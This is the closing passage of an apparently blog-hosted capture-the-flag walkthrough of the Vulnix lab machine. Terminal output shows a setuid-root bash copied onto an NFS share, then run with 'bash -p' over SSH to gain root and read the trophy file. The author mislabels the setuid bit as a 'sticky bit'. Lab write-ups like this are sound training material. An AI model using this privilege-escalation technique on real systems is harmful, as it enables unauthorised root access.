root@kali:/tmp/nfs# ls -la

total 1116
drwxr-x--- 4 vulnix vulnix 4096 May 16 19:18 .
drwxrwxrwt 13 root root 4096 May 16 19:45 ..
-rwsrwxrwx 1 root root 1109604 May 16 19:18 bash
-rw------- 1 vulnix vulnix 13 May 16 16:41 .bash_history
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx------ 2 vulnix vulnix 4096 May 16 16:35 .cache
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 May 16 16:35 .ssh
root@kali:/tmp/nfs#

Execute bash with the sticky bit set on the vulnix machine.

root@kali:~# ssh vulnix@192.168.1.33
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation:  https://help.ubuntu.com/
System information as of Wed May 17 00:12:44 BST 2017
System load:  0.0              Processes:           87
Usage of /: 90.4% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 192.168.1.33
Swap usage: 0%
=> / is using 90.4% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue May 16 21:42:24 2017 from 192.168.1.34
vulnix@vulnix:~$ la -la
total 1116
drwxr-x--- 4 vulnix vulnix 4096 May 17 00:18 .
drwxr-xr-x 4 root root 4096 Sep 2 2012 ..
-rwsrwxrwx 1 root root 1109604 May 17 00:18 bash
-rw------- 1 vulnix vulnix 13 May 16 21:41 .bash_history
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
drwx------ 2 vulnix vulnix 4096 May 16 21:35 .cache
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
drwxr-xr-x 2 vulnix vulnix 4096 May 16 21:35 .ssh
vulnix@vulnix:~$ ./bash -p
./bash: /lib/i386-linux-gnu/libtinfo.so.5: no version information available (required by ./bash)

bash-4.3# id
uid=2008(vulnix) gid=2008(vulnix) euid=0(root) groups=0(root),2008(vulnix)
bash-4.3# cd /root
bash-4.3# ls
trophy.txt
bash-4.3# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
bash-4.3#

Finally we are root. This was not an easy challenge as I had no idea about root squashing. But I did learn a few things while solving this challenge. Overall it is a nice one by @rebootuser.

Happy Hacking !!!

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.